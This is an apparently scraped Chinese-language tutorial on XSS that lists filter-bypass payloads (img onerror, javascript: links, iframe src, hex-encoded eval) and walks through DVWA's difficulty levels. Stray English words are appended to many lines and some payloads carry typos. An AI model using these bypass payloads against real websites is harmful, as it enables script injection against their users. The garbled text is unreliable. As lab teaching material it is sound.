Xss漏洞javascript
Xss漏洞出如今1996年。Xss漏洞又名跨站腳本漏洞html
Xss可能形成的危害java
Xss分類web
1.儲存型xssxss
2.反彈型xss網站
攻擊spa
注意:當xss攻擊執行不成功的時候,得想辦法判斷他爲何不成功3d
是被過濾掉了呢,仍是沒有閉合對應的標籤。htm
<script>alert(‘xss’)</script>blog
0×04 過濾的解決辦法
假如說網站禁止過濾了script 這時該怎麼辦呢,記住一句話,這是我總結出來的「xss就是在頁面執行你想要的js」不用管那麼多,只要能運行咱們的js就OK,好比用img標籤或者a標籤。咱們能夠這樣寫
<img scr=1 onerror=alert('xss')>當找不到圖片名爲1的文件時,執行alert('xss')<a href=javascrip:alert('xss')>s</a> 點擊s時運行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執行彈窗
經常使用的攻擊標籤:img、iframe,script,div,style,input,a,math,title等等
Xss過濾表:http://www.freebuf.com/articles/web/153055.html
Xss payload 大全:https://www.jianshu.com/p/3f16269c83db
新型的xss payload在推特關注:xss hack
Xss平臺:
以DVWA作個例子,低級->不可能
級別:低級:
描述:無任何過濾
Payload:<script>alert(‘xss’)</script>
Php代碼:
級別:中級
描述:把script標籤過濾了
Payload:<img src=1 onerror=alert(/xss/)>,
Php代碼:
級別:高級
描述:用正則過濾掉scrip
Payload:<img src=1 onerror=alert(/xss/)> 同樣
Php代碼:
不可能級別,把用戶輸入的實體化了,因此沒有xss漏洞。